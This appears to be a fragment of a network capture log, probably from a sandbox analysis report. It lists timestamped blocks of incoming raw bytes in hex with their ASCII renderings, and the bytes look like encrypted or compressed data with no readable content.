                                                                                                                                                    2022-09-29 12:59:12 UTC16560INData Raw: 67 5c 5f fa 94 50 0d 9d 99 be cf cd 21 00 26 5f 06 31 d6 23 d6 b4 00 58 f4 3c 6a 48 11 64 96 ac 0a e3 f9 a1 bd 30 95 b6 a2 8e 0c 55 e7 35 2f d5 12 8c eb d5 6e 22 76 41 a4 3b 2d f7 e9 e1 83 35 f5 ac 8d 86 57 2a 59 52 23 98 bf c8 a9 79 ff 70 64 21 49 7a fa c0 1f 3b 27 ea 02 47 cd a5 ab 0b b1 40 39 a2 9e fb 6c e7 63 4c 21 bd 2f 0b 70 6b 35 cd 1b ab 0e 60 18 21 98 39 07 d4 c5 4f fd c3 fe e6 14 5b 5f cf d8 f3 bb b4 8b d8 0e e6 40 d5 12 12 af 52 b7 d9 0e d3 66 51 6b e1 c7 c2 84 8a d9 d7 92 21 a3 4d ab 85 54 55 7b 17 47 72 fe 2f 89 ab 74 df d2 a4 f9 72 48 9a df 5c 80 8c 2d db f8 cf 29 73 af a9 68 de 8f 0a 26 d5 55 fe 1b 98 10 a1 bb 91 81 bb 72 99 b4 53 46 51 57 cb 68 ca df 3a 5b 48 c3 89 df b9 68 85 79 4d 38 ab c5 ad 23 82 8d 97 ad 95 fe ad 79 61 56 2e 9c a8 7a
                                                                                                                                                    Data Ascii: g\_P!&_1#X<jHd0U5/n"vA;-5W*YR#ypd!Iz;'G@9lcL!/pk5`!9O[_@RfQk!MTU{Gr/trH\-)sh&UrSFQWh:[HhyM8#yaV.z
                                                                                                                                                    2022-09-29 12:59:12 UTC16576INData Raw: e7 c4 54 f6 8d e6 a8 c8 fd 62 3e 6d 08 0a 5d 76 80 ef 8b 46 70 97 1e ef 4d ba fc 5c 7b 9d 59 5b ff bc db d0 6e 3f 91 51 87 60 57 b3 05 58 8f 35 c8 4a e9 83 08 e3 ba 14 94 cb 83 71 40 a9 e5 24 7e bb 7f 96 c8 b4 47 1a a1 7f 79 15 9b cf fa b4 87 08 f6 cb 24 31 8f 04 b9 e7 bd 2e c0 c8 1e 00 e0 d1 d3 e1 33 58 76 2d a5 19 d3 dd b6 fa 1f d7 ee 0d a1 5b d6 bb 2c d5 18 df d8 29 e9 b0 d8 2a 95 05 16 54 74 04 c5 38 6d 9f 08 1e 69 fb 8b 31 fd 91 3c ce 6b a9 5f 3b fb f3 f1 50 b1 bb 55 ad d5 53 ab 63 89 4c 56 7e ee 3a ae 61 b2 04 f8 e1 22 1f 5f 2b 18 a3 8b 67 f7 5f ed d2 88 42 05 9e 6b 4f b4 d2 db a4 b3 93 29 69 ab 7c 4e f2 75 90 15 7a b9 58 a6 88 f6 27 1b 38 16 86 bf 7c 59 50 2c 53 8a 84 49 4a 25 3f dc 66 05 9d f2 79 9d ea 5b 23 b1 82 92 6c 78 15 6e 0e 6b 69 34 14 4d
                                                                                                                                                    Data Ascii: Tb>m]vFpM\{Y[n?Q`WX5Jq@$~Gy$1.3Xv-[,)*Tt8mi1<k_;PUScLV~:a"_+g_BkO)i|NuzX'8|YP,SIJ%?fy[#lxnki4M
                                                                                                                                                    2022-09-29 12:59:12 UTC16592INData Raw: 83 03 5c cc fa a6 a7 72 a9 df 8c a3 c4 bd 96 4e a7 1c 22 cf 73 c2 52 12 a5 ee 86 3f be 75 61 93 2e e7 90 a5 c5 e0 ce bc 50 6d 6d 44 70 2f 47 93 ef cf 06 cb dc ab 27 5f d6 c5 47 ec c8 29 8d 9e ad 60 72 ef b8 f8 ed 8a a6 e0 78 53 09 8a 54 2b ff 8f 61 33 7a 27 de 1a 24 21 64 bf 02 c5 c3 b8 cb 09 d4 78 ae 64 06 39 42 1a b5 28 f6 5d fe a4 5e be a2 de f9 84 6d cd 53 8b e6 98 c6 f2 1b ce 38 54 39 3c 2c 3d 8f f1 64 be 29 b8 3c 4e f7 3d 7a f9 36 c4 e2 7f 92 1a 2d 91 4a 9a 26 8c 55 ad dc 60 4a f4 bc 06 df 84 fd 83 47 81 bb 94 94 6c f7 fc 0d b0 7b c5 e3 18 6f 69 19 52 f4 4d c2 a0 61 ec a1 b2 2b f9 35 28 65 3b e2 3c cf ef db 4d 62 26 30 02 7e 60 15 d8 65 e6 57 03 0b ef 99 30 5e 02 61 0f 3d ef 05 79 21 05 6d 4f f3 fb 21 e6 2e ca b3 18 a7 32 d4 7e 35 29 a1 71 42 0d b6
                                                                                                                                                    Data Ascii: \rN"sR?ua.PmmDp/G'_G)`rxST+a3z'$!dxd9B(]^mS8T9<,=d)<N=z6-J&U`JGl{oiRMa+5(e;<Mb&0~`eW0^a=y!mO!.2~5)qB
                                                                                                                                                    2022-09-29 12:59:12 UTC16608INData Raw: 40 1c e8 d6 0d 17 ea 4d 12 12 13 0e cf c8 e9 82 5b 80 b4 42 69 14 ac 5a 17 c3 59 0f 46 91 9f 47 69 8a 66 db 4e 68 bb e2 2a bd 6c 7e 93 6c 28 65 f8 4f b7 b4 c3 fb da 76 bf 25 59 a0 83 cd e1 27 4b 85 f6 27 1b 9b b2 0b 85 94 85 06 11 c7 2a 55 8e f7 35 eb 2e 4f da ff 96 ab e0 03 42 da 7b c6 7d c9 ef d9 e3 40 8f b8 ef e0 70 4a fd 4e b6 56 59 5f f6 1a 69 93 f5 d8 4e 5b f6 11 c9 91 63 e1 05 eb 94 e3 ff d3 1a f1 06 39 0b 62 17 31 96 7d 2a 85 1c 04 a1 6e f3 62 8a 1b 0d ff 65 07 98 90 ef bc 74 4b 0f f8 1e 1e f6 f2 96 e0 0f 85 94 d0 18 9d 18 f8 6a 10 4c 38 ba 62 44 5f 71 0f c1 b9 52 1e 75 ee 14 83 2f 12 9e cb 7e 1e f0 fe ed 32 99 f8 ac c7 b6 f5 67 57 7a 1c 49 35 62 b0 bf e0 7d 32 25 53 f4 45 5c 33 7f ee d4 23 31 c7 d5 fc 6b 2a 39 ce dd 36 45 d1 bd b9 74 ef 2b da 0b
                                                                                                                                                    Data Ascii: @M[BiZYFGifNh*l~l(eOv%Y'K'*U5.OB{}@pJNVY_iN[c9b1}*nbetKjL8bD_qRu/~2gWzI5b}2%SE\3#1k*96Et+
                                                                                                                                                    2022-09-29 12:59:12 UTC16624INData Raw: 99 4b 04 8c 4d 07 f9 10 d4 65 cc 3a cf a7 51 df f2 63 59 a2 06 e3 ef 06 5a 6f c2 98 22 93 4a a6 f9 c5 82 80 01 27 98 7a a2 59 c9 88 41 b2 dc 76 fd 8c 19 69 04 97 09 e8 f4 01 89 b9 52 1d 2e fc dd 63 01 e9 51 79 7d 2e 80 49 74 8f b0 bb 09 9b 10 68 45 15 d7 4a 40 02 66 57 91 90 db dd 1e b1 ce 02 43 10 19 54 1e 9f 79 86 0c f8 01 09 c7 26 e1 27 81 a6 46 ab 18 0e 92 2f 93 54 de ea 14 82 a5 0e 59 74 ee 69 9d 9e c9 b8 61 9e 0c 4c 9e eb 24 60 b5 da 68 d9 fa 6f 5a 93 c0 14 2b 93 64 2d e7 ba ee b8 11 91 4e 85 83 10 fc 50 46 cc 4d 4d ec 67 ec 9c 46 d5 dc ff 02 ad 36 ab bf f8 e3 c2 f5 2b ed bf fc 21 ea 92 5e f6 ea 8e 19 0f 2b 32 d9 94 29 25 57 18 b7 d8 4b 35 28 7f b4 69 85 82 e7 59 d6 9c 9e db 95 ca 64 e9 7b 3c 13 50 dd ca 4f ba 04 71 5d 8f f4 5a 73 5f d6 e4 65 b0 33
                                                                                                                                                    Data Ascii: KMe:QcYZo"J'zYAviR.cQy}.IthEJ@fWCTy&'F/TYtiaL$`hoZ+d-NPFMMgF6+!^+2)%WK5(iYd{<POq]Zs_e3
                                                                                                                                                    2022-09-29 12:59:12 UTC16640INData Raw: 93 f5 da dc d2 3a 0a dc ee d8 ac 60 43 40 f2 3c f3 bf 87 6e 18 8b dc b2 45 7b 67 b9 45 46 e8 86 e9 f4 bc 0e bf da ed 41 9b 91 20 42 ea be e5 d5 83 a0 b1 8f 4a 5a b3 97 2b a2 62 be c9 d1 be ea f3 2a 61 14 26 83 fd fa 53 e6 19 29 97 4e 5e b1 1b 95 98 5e 02 4a cf e5 57 80 e0 8f 1d bf 3a e2 13 80 11 fd 02 ba d4 1e 35 a6 b5 56 c9 73 90 a5 cd 1f b0 1f 7b 75 d3 26 d7 60 2b 64 bd 83 a6 b2 14 d5 fc eb 59 4d 3d a4 b9 6a 8a df 40 60 33 7e ce d3 34 76 c8 e3 55 96 82 0e 0b 12 d9 69 2e 73 17 51 0f ae 9b 73 7e fa 1b 5d 3d 6d df 0c f9 f1 af e0 e4 f8 61 6c 3e a8 c5 e9 01 f2 77 30 67 ca 35 50 a4 2b de e9 0c 5f 4b 88 d6 0c 86 8f 67 b9 b4 3f 41 33 1e 66 eb d7 6b bb d9 aa a6 f3 e5 da 25 02 8a a9 fd ce 02 ed 05 39 dd 51 c6 1d f9 8e 8c 2b 07 d5 15 cf 88 1d fc 0f ad 9a 50 5a f6
                                                                                                                                                    Data Ascii: :`C@<nE{gEFA BJZ+b*a&S)N^^JW:5Vs{u&`+dYM=j@`3~4vUi.sQs~]=mal>w0g5P+_Kg?A3fk%9Q+PZ
                                                                                                                                                    2022-09-29 12:59:12 UTC16656INData Raw: 98 c6 8d a0 22 8b 20 e0 9d cc 40 1f 53 61 6e 49 e0 14 b3 79 49 3a bb 87 9b 11 5e df 88 9e b9 7e fe b8 05 69 6d 33 b9 1f d6 0b 39 b5 97 cc 02 09 bd be c3 f8 53 4c 6b 9e 2f 8c 5e a6 7e 28 f7 d0 f5 42 8a f5 8c af c6 96 40 26 42 51 ff a6 10 ae 62 d7 2b 6d 39 9f d0 57 ba 3c 75 09 9b 18 58 75 bf 48 b0 e3 fa 00 28 f7 ed c9 d0 5c 3b 16 16 35 de a3 fd 63 7d 4d 02 ae 7d e6 17 61 87 a0 43 93 b0 ee c5 62 a9 ef 29 e4 0b c2 91 38 a9 c7 8f 96 ac 98 b5 b9 b3 c3 de 52 f2 7d fa 66 1d 47 a2 a8 3e c1 c7 b2 a1 70 50 ed 08 57 7f b3 22 2d 76 e0 b7 d8 de 4f 4c 0b 89 ed 53 5a 00 b1 05 75 b7 7d 23 04 f4 9f 50 41 93 a4 e2 67 ec 73 88 0d 46 1d 5d 02 c1 b9 df 51 9b c0 3a 9a 17 df a5 54 16 4a ac d7 9b fe ec 67 83 8a d8 f8 11 47 20 d3 90 20 50 e6 d8 28 48 65 21 2b 98 04 ab e1 d2 be ce
                                                                                                                                                    Data Ascii: " @SanIyI:^~im39SLk/^~(B@&BQb+m9W<uXuH(\;5c}M}aCb)8R}fG>pPW"-vOLSZu}#PAgsF]Q:TJgG P(He!+
                                                                                                                                                    2022-09-29 12:59:12 UTC16672INData Raw: 94 07 28 f0 07 18 24 97 da 2f 5e a0 93 f7 5f 4c fc 91 56 b1 0a e3 c3 87 83 05 fb 7f 51 fe 16 9f 18 d9 11 32 de db 92 34 9b 55 eb 17 47 f3 fe e9 13 de b8 dc cd d0 19 4c 1a dd 16 3a 14 1d ba d3 39 5e bd 9d 04 40 00 99 3c ae 2f 70 cf eb 07 5f 26 a8 ea d2 db 63 a7 81 ea f3 d2 93 0d 26 f9 d6 dc 5c 7c e3 25 14 a6 73 af b0 91 93 18 24 bf d2 dc a7 e1 9c 6d 9b 1a 5e 23 17 39 ce 0d 7d b6 8d 85 52 35 cd 15 7f 68 e2 d9 e9 54 10 03 ee d5 87 e1 f2 34 d1 7e 63 07 f1 0b 4c 01 22 7e ef c3 fc c1 3e 1a eb 4c ad eb b2 75 0a 46 a8 09 88 8f e1 d0 73 79 53 6d 44 d0 f6 25 2c 08 4c a8 84 84 3f 90 e2 2f 07 46 75 e9 33 2e 32 a9 20 09 77 57 8f 8d e0 4f fc 1f 35 b4 e8 40 8a f7 ab b5 a1 fa a4 a3 97 ba 8d 60 5f dd d2 b7 04 4b a9 3d 8f 2e dd d4 35 0c a0 0d 4d e6 39 e7 59 1c 9f 22 1b bd
                                                                                                                                                    Data Ascii: ($/^_LVQ24UGL:9^@</p_&c&\|%s$m^#9}R5hT4~cL"~>LuFsySmD%,L?/Fu3.2 wWO5@`_K=.5M9Y"
                                                                                                                                                    2022-09-29 12:59:12 UTC16688INData Raw: 4d 29 18 c8 7b 67 32 26 77 17 ad 70 85 c5 97 92 f9 d6 48 a7 e6 c6 0a 01 35 c4 43 13 c5 07 17 8b c1 80 bb 85 bc 3b 4b f8 35 44 3f 27 90 7c b6 97 e1 6b 08 74 55 4f fb 7e 29 62 45 d7 fe 75 ab bb 52 9a 86 21 e9 2e 1e 8d 10 68 5b d1 5d 0a cf c8 3b 1e 6b 1a 41 73 3a 49 14 6e ab 04 fe 6f df 4c 68 8a 92 04 24 c7 c8 cb b3 bd f5 fb 29 d0 6b 48 43 61 63 b1 b8 fc 39 c9 84 aa f5 8e f6 4c c9 14 18 26 f9 cd ab 29 a2 dd 43 c2 ea 9e 12 bb c0 28 b6 21 e8 3d 85 c7 29 d9 93 f5 fc 81 41 c8 30 1f e2 41 49 2e 37 79 bf c0 55 c8 69 9e f6 b3 bf 97 fd 8e 76 35 db d1 9f 2a b8 57 e7 61 c9 ff 8f 86 e5 01 a6 b9 2d c3 88 92 e0 1b 8c 35 b8 94 cf e8 7c 68 20 d8 9f 89 c1 ae 44 f8 8a f9 f1 3c 06 26 da 83 bb 22 e9 e0 31 e3 3b 57 ed 64 31 90 72 aa 2d a8 2b 0f 5b b4 2c 3f 74 08 1a 89 23 aa 96
                                                                                                                                                    Data Ascii: M){g2&wpH5C;K5D?'|ktUO~)bEuR!.h[];kAs:InoLh$)kHCac9L&)C(!=)A0AI.7yUiv5*Wa-5|h D<&"1;Wd1r-+[,?t#
                                                                                                                                                    2022-09-29 12:59:12 UTC16704INData Raw: b8 66 db 66 be 06 3e 92 5f 1c 57 7b 91 7b 7a 5c d6 45 0e 9d 50 1a f7 c8 08 33 d5 eb fb 83 f9 fb 89 7e ee fe c0 39 8d cd 36 98 25 22 81 93 e1 5f 63 af 8a 3e df 3a 94 db 11 fb 83 3b ba 44 64 76 f2 71 52 47 4c f0 65 6b 37 59 6f b7 4d 42 f7 55 6b 92 e1 71 65 05 f8 d6 a4 91 6b 21 6d fd 20 7f 84 33 be 29 b2 6b d1 3a 02 cc fa ba bd 07 01 19 29 3e 57 86 09 7a ed 49 e4 f6 4a 64 18 e9 d1 b1 5b 0a 6b 4a d4 93 b8 e4 c7 c5 57 4a e0 a4 91 e1 28 17 46 6e c2 4f 7a 76 63 4d cc 8b 41 88 65 fa 35 11 b9 e0 2b b9 68 0c 68 86 d0 f8 21 ba 54 52 48 48 ee 3a 8c 3b 0c 10 05 19 66 82 84 30 e3 53 6f 9c 64 16 e4 bf 33 1f 11 dc 32 df 83 51 b9 74 ce c9 87 d7 f3 a7 1c 0f 9b 57 27 54 86 1c a7 7a 6d 1d 42 57 b2 69 66 99 5e 8e 20 e0 e9 d1 c6 04 91 fb 62 04 fb 8c be 32 e4 25 77 3e a5 68 d2
                                                                                                                                                    Data Ascii: ff>_W{{z\EP3~96%"_c>:;DdvqRGLek7YoMBUkqek!m 3)k:)>WzIJd[kJWJ(FnOzvcMAe5+hh!TRHH:;f0Sod32QtW'TzmBWif^ b2%w>h
                                                                                                                                                    2022-09-29 12:59:12 UTC16720INData Raw: ff 7b 0f 6e 60 68 73 a7 0a 60 7a 69 05 8d 10 0a 8f cb 6a c7 4c 19 85 90 9f 21 ee f1 c6 ba 72 fc 08 bf 4b 07 9c a5 01 14 85 11 f4 bf b4 00 a5 c4 9c 38 2f 24 ad 14 2b 06 d0 be 64 aa 54 85 30 3e 97 52 00 d2 a9 8e 36 9d 8a 61 bd 28 ae 86 46 65 97 98 7f ff 11 dd fc 39 e2 f1 37 4a 72 1a bd 78 40 32 44 0b 83 fc 12 7f 4c 14 f8 44 2f 21 df 4a ff c5 ea be 3b b9 da cc 14 7f c2 11 8a f0 c3 c0 91 4e 54 a4 0f 88 c9 a7 2f 32 8d 08 e3 0f a6 cb 3e f6 4c 63 98 f7 10 d8 36 8e 09 94 f5 aa 16 e8 67 1b d2 7e 51 fb 33 34 44 c5 7a 1f 7f e1 0e 2a 72 71 4c 79 40 6e 69 09 0b 7d 5c b2 93 f5 23 c4 f4 2b f6 16 4c 5b 33 15 15 fd 88 bc d4 50 56 5f 36 8a 6f 36 f4 bb 35 4f 71 47 ee 77 3b da fb c0 c6 3e f9 85 ee 93 b7 67 49 a7 42 fc 24 d8 aa 65 6a b9 6d 0c 32 37 93 8e a2 a7 0e 38 ed 2e d9
                                                                                                                                                    Data Ascii: {n`hs`zijL!rK8/$+dT0>R6a(Fe97Jrx@2DLD/!J;NT/2>Lc6g~Q34Dz*rqLy@ni}\#+L[3PV_6o65OqGw;>gIB$ejm278.
                                                                                                                                                    2022-09-29 12:59:12 UTC16736INData Raw: 70 03 15 0a 18 bf 2d df 17 0e 93 da 1d 9e 0c a7 32 83 52 2d 4c e0 92 68 9c 89 49 f5 d3 fc bb 4d fd da e4 03 68 97 60 ff 25 89 1d 64 fa b6 72 14 18 8c f7 d0 6c 06 31 0e 9b 5a d2 20 aa 08 33 b5 72 37 50 52 18 50 54 8c 0e 8b 3e 79 e9 9a 18 de 3b 97 b3 f8 52 55 3e 6a 8f ac ac 31 bc 60 71 aa bf 69 ea 9b 15 27 0f 56 ca fb 5e d2 3e 38 72 bc c9 df e6 ba 65 f6 11 ea 10 23 6b 21 a1 cf 60 b4 d6 b3 e5 c1 37 4d ff 33 c4 7e 8d 65 03 71 e5 f0 76 b4 c6 5c fd b7 89 91 43 cd 0a d7 95 c1 f6 1e 1c 63 a5 47 d7 a2 16 c0 0d d8 e2 38 e4 27 d6 76 98 7b 8a 81 99 dc d5 5a 0f ae 53 d3 d1 55 61 7c ac e9 e8 e1 8a 20 04 06 ba 8d e1 b5 d8 dd c0 bd 7c 78 fe 43 91 d1 18 9c e5 0b 87 1c 4e da 1a 9d c7 22 85 2e d8 2f 2b c6 04 5f 06 54 26 74 36 8e ad 52 71 a0 05 28 c8 c8 ba fe 03 48 1a fb 3e
                                                                                                                                                    Data Ascii: p-2R-LhIMh`%drl1Z 3r7PRPT>y;RU>j1`qi'V^>8re#k!`7M3~eqv\CcG8'v{ZSUa| |xCN"./+_T&t6Rq(H>
                                                                                                                                                    2022-09-29 12:59:12 UTC16752INData Raw: b2 0e bf 73 aa 48 82 d4 37 a0 88 ec 8e 29 83 4e 71 8c c4 f1 b8 a5 b5 f5 bf 95 b1 6a b0 7e a7 68 06 cd 6d f6 4d 87 86 69 ff c0 fc 4b f2 30 b5 c4 de 34 b8 20 ed 3c 34 5c cd 07 4c d1 31 05 41 d3 84 e5 d3 48 92 50 85 af 10 ee b0 0c f9 a3 a7 28 83 1f ad a4 cf 10 83 45 f1 5d 3e b4 3b 2c fc 4b 93 32 c7 5d c8 3c 07 51 b9 88 28 3a 04 db 4a 44 e5 cf 8b 50 eb f1 88 69 1e 0c 0e b6 28 75 e2 de 5c ab e9 23 b4 fe fc dc 78 d2 9b bc 57 30 6f c2 89 73 62 3a 90 49 fa e1 05 3f 5f 30 29 b0 e6 47 54 62 3b a6 c5 25 61 41 e3 7f c0 52 3d e4 53 42 64 34 c5 4b 78 04 dc fb 2c 9e 67 73 3d ae 9e 6b 97 4e 7f 25 f6 94 7a a6 97 ae 1c ae 22 2b f0 58 37 7e 7d f0 0a 9b ff 80 14 16 6f d0 94 dc 35 48 2f ac d6 b1 71 58 8a a0 12 e3 ef ad 86 97 91 b1 4a ee ef 32 69 78 95 62 51 0d 80 96 df cb d2
                                                                                                                                                    Data Ascii: sH7)Nqj~hmMiK04 <4\L1AHP(E]>;,K2]<Q(:JDPi(u\#xW0osb:I?_0)GTb;%aAR=SBd4Kx,gs=kN%z"+X7~}o5H/qXJ2ixbQ
                                                                                                                                                    2022-09-29 12:59:12 UTC16768INData Raw: 91 28 8a 6e 44 8f 24 4b 52 a8 6e fb c9 fc 85 19 4e 57 b7 6f 33 e7 ff 1b 3e fd 6b 20 65 53 64 ba d3 e3 db 78 de 63 9d b8 4c 95 5a 24 46 10 c5 a5 c9 b8 2d bd df b3 3a f4 31 a6 3a b6 3d 63 52 7e d6 dc 48 7b f3 ed 85 f1 5a 12 c6 74 5c 1c 7f 4d 0c 2b 44 7e c7 d6 49 18 60 30 a0 79 db 8c 82 82 0c b3 8a d5 95 de 1d 6d 0d 61 c2 e8 2d ca d8 2f df b9 b3 af fe 61 42 bc 14 82 cc 09 a6 24 e4 3d f1 3d 0f dc c5 04 90 58 8d 35 7f 01 6d 6e 69 e6 ee 27 6b 97 dd f5 54 b9 e8 cf 69 aa 9e 28 5b 30 c1 7f 2e 3d 76 77 c3 d5 e5 f6 42 bf 04 d6 83 1b 27 90 39 4a e4 5b 51 86 cc 28 65 1a 8b 52 74 56 65 0a 47 bf 94 48 5f 9e 9e 12 46 7c 67 c9 34 31 95 ed c7 13 bc 4c 1d 0e 42 50 9f fc 6c 6d 4f 6c 94 50 16 8b 9b d0 0b 91 71 40 d4 04 f3 b6 10 9d 54 fe 04 db 85 91 ff 12 47 f4 52 f8 2d f4 b5
                                                                                                                                                    Data Ascii: (nD$KRnNWo3>k eSdxcLZ$F-:1:=cR~H{Zt\M+D~I`0yma-/aB$==X5mni'kTi([0.=vwB'9J[Q(eRtVeGH_F|g41LBPlmOlPq@TGR-
                                                                                                                                                    2022-09-29 12:59:12 UTC16784INData Raw: 13 73 cf 02 9b 7a a9 b6 b9 0a 67 0a 40 e8 bb 78 db ad 21 c3 78 fa 3f 8a 8c 60 ac 0a 0b 33 e0 1b 94 7a 24 22 e8 b7 72 87 f3 41 c8 1a cd e6 d8 b0 d7 b1 4d 21 4c c9 50 27 20 ab a6 3a 1f eb 25 59 b8 ed 92 4f b3 3d 39 3a fe 41 b4 c8 e4 de 23 9f ad 8d fd 77 90 ea d7 7a 04 28 ab fb 14 56 eb 23 14 1f 25 b7 8b b3 d3 eb 48 33 de 19 5a 59 89 56 30 43 51 07 0b 93 13 74 51 48 2c b1 49 18 c9 a3 ed 96 85 89 b4 16 8b 63 e7 11 b8 66 a4 47 7e b4 17 3f 9a 20 68 f1 14 d4 71 fc 69 3e db ae f0 6b ec 5c a0 ba e3 ce 18 88 81 ef 91 99 2e 62 bf b8 46 2a 62 8c 96 39 85 16 8c a6 44 a0 0b f2 72 d2 ef e3 17 8c a6 71 5f 65 01 96 c6 76 3d e6 77 24 5f 84 b8 fd eb f5 d6 62 13 04 56 d4 fc 0a db 83 d4 e2 62 6d 4c da a0 1d e2 be ca 3a 2b 13 8e b0 7f 84 79 1d e3 ac 75 64 d4 57 17 dc 3f 4c d8
                                                                                                                                                    Data Ascii: szg@x!x?`3z$"rAM!LP' :%YO=9:A#wz(V#%H3ZYV0CQtQH,IcfG~? hqi>k\.bF*b9Drq_ev=w$_bVbmL:+yudW?L
                                                                                                                                                    2022-09-29 12:59:12 UTC16800INData Raw: da 20 86 a5 ec 28 d9 45 f8 bf 6e c1 cc 89 ee 72 d7 89 d8 c5 8c b0 41 17 83 db 47 cc 52 c1 51 26 ac 9f 0b 94 32 1b 19 b8 d4 8e 9a 09 71 ac 4c 23 4a a6 a4 67 ad db 9e b0 39 dc 21 a1 2e 7b 5d d1 c1 78 f0 cd 19 22 e4 e8 df 7f 6d 40 4f 0c d2 ba 3a 17 6d 99 2b b4 c3 ba 1a 2f 78 78 ed e8 f5 09 0a 48 e9 e9 5a eb ba 8c 93 c7 1c 71 58 45 13 55 f3 19 6c 72 11 1b c8 c9 95 08 a4 e1 c1 fb da 06 c5 a8 35 fd b7 37 13 57 25 c0 5d 21 9c ff 60 eb 76 c2 4d 7c 6f 24 67 54 aa 08 d3 55 a5 7a ab cc 31 f9 68 b0 8a 8d 2b 34 76 94 68 66 9c 93 f3 fd fc c1 ab b8 f0 21 de ed 17 92 2d aa e4 0a 4a ed 77 87 ef b3 e9 4e 09 00 b7 e6 42 e5 c6 84 81 c0 69 cf 53 da c0 a8 b1 b5 da d4 47 0e 9f c7 72 4e c9 9d 9d 29 ae 74 c3 16 91 76 3d e5 8f f7 b7 54 75 86 ec 61 b3 32 38 b0 38 b5 1a 29 55 64 d6
                                                                                                                                                    Data Ascii: (EnrAGRQ&2qL#Jg9!.{]x"m@O:m+/xxHZqXEUlr57W%]!`vM|o$gTUz1h+4vhf!-JwNBiSGrN)tv=Tua288)Ud
                                                                                                                                                    2022-09-29 12:59:12 UTC16816INData Raw: a9 9c 5d 23 29 07 a9 f5 63 f4 15 81 ee 79 ab 8d d0 e1 9c 47 82 2e 6a ad 78 d2 e3 af 9e 1a 81 dc 81 61 96 45 39 f0 35 76 af 13 1c 5e 3f bf 28 78 3a b4 01 e1 b5 70 9d f3 08 df 22 36 d6 d9 7c 68 55 0b ff 8c 8e c1 d2 77 2f a4 23 9f da d9 8a 58 86 98 b0 51 8c ec 78 ed bc cd 6c f8 67 32 24 c2 9a d4 13 c5 27 6d 67 3c 4c 06 78 c7 ca 5d 07 6b 57 94 49 e8 d8 57 4e f2 d4 74 b7 2f 0d 27 d8 ae 0f 85 f2 d6 6d b8 35 3e 61 b3 d4 34 7b 91 32 5d 78 54 04 26 fa 92 95 b3 c9 16 bb 75 d9 89 e0 30 bc ef 10 71 64 8c 7f ed 9d 4c dd f7 2b 7d f2 36 69 3b 95 0a ef 3f 1b 85 7d bd 89 32 31 c4 91 58 5f 52 e1 68 78 ad e0 78 00 3c 84 18 fd 65 b2 b7 3a b1 71 57 fc b0 d6 f7 46 9f 86 ee 77 2c 0f 94 85 69 e2 f8 fc 58 a1 3c 91 d5 ea 1c c1 87 dd 81 68 07 e2 a5 e8 e3 86 09 1e 9d c6 62 51 5d 79
                                                                                                                                                    Data Ascii: ]#)cyG.jxaE95v^?(x:p"6|hUw/#XQxlg2$'mg<Lx]kWIWNt/'m5>a4{2]xT&u0qdL+}6i;?}21X_Rhxx<e:qWFw,iX<hbQ]y
                                                                                                                                                    2022-09-29 12:59:12 UTC16832INData Raw: 6e 0b 50 9b ee 72 b6 75 8e 40 05 02 8b 29 59 1e dd 6c 32 53 1b 83 6e aa 88 84 33 35 a1 b2 ee 2c 6a f8 ff 33 ed 6d 01 b8 43 86 c2 9f 0e 3f 9c 0f 5f cd 1c b3 e5 66 0c 63 e7 87 64 5a d3 e5 ac aa d0 3d 43 62 d5 bb ce 32 1d 49 ed c2 7a 3e b6 64 bb 13 48 41 d4 e5 11 24 f1 f6 14 94 66 9d 20 0c 5f 6f ac d0 4e d7 f3 3c 81 4b 2e 61 03 d1 75 f1 50 c0 8d 01 32 94 04 75 7f 1c e5 22 04 55 14 3f d7 d0 c4 48 33 77 f1 0d 28 ec 3e fd ba d5 8c 9f cc 14 c0 9c 08 14 6e a3 ec a9 f2 12 cc 2b d8 26 7a 44 42 27 f7 14 40 fa da 13 d1 52 c4 b2 20 cb 18 f1 27 11 18 1e 4b c2 c2 f2 82 6d 32 d8 2c e1 cb 32 e0 db 3d c1 49 32 71 c8 74 86 2f f2 40 59 d8 6e a0 9a 2e 82 74 fc 11 5d 86 4a d4 2f fd 24 9a 80 9e 70 a7 a7 32 0d 6c 4d 20 23 88 e9 9d ff 58 84 ac 0b da af ea 6e 2e 91 08 3d 71 e7 32
                                                                                                                                                    Data Ascii: nPru@)Yl2Sn35,j3mC?_fcdZ=Cb2Iz>dHA$f _oN<K.auP2u"U?H3w(>n+&zDB'@R 'Km2,2=I2qt/@Yn.t]J/$p2lM #Xn.=q2
                                                                                                                                                    2022-09-29 12:59:12 UTC16848INData Raw: 6e 02 ae ae 6f 9d 15 a4 58 1a b7 df 76 83 fd 6d bd 66 34 fa c1 83 34 fb 4a a2 25 ad 07 99 bc 9a c0 4e d9 3a b2 4f 53 76 2f 81 23 46 da 14 b1 88 99 98 e1 17 08 7b 8b 8f ac bf be f7 2d 91 a6 78 7c 71 11 46 2c ae 32 1d d2 71 c2 17 89 c1 07 83 53 7c 7d 44 db 88 0f 8f 23 0f 49 87 39 72 79 44 68 03 30 83 04 ea e5 f4 d1 d6 7f 20 d5 dc 29 b2 0a f5 33 ab d9 eb 13 0e 15 4b eb 25 39 ab 48 c3 fa 90 6f 82 39 68 11 6c cc 48 7b ad e7 d4 3c ad c6 c4 b9 e8 93 f4 ca 9f cc 76 3d 59 c8 dd 28 ee 88 56 07 9a ff 8b 39 7e b1 35 06 38 26 8b 39 50 25 a8 fa ef e0 9d ac c8 c5 89 bf e3 9d 2b c8 88 be 59 5b 80 41 7d fa 74 ba 07 fd c4 11 c5 de dc 24 e2 47 d0 10 6a cf 0c 7d 9d f3 09 da e8 f0 0a 0a ac 62 50 44 5a 34 9f dd 3d e2 7c 10 68 53 bb 11 d3 81 f4 f4 84 e3 ce 6e 8c 14 0d b5 5e de
                                                                                                                                                    Data Ascii: noXvmf44J%N:OSv/#F{-x|qF,2qS|}D#I9ryDh0 )3K%9Ho9hlH{<v=Y(V9~58&9P%+Y[A}t$Gj}bPDZ4=|hSn^
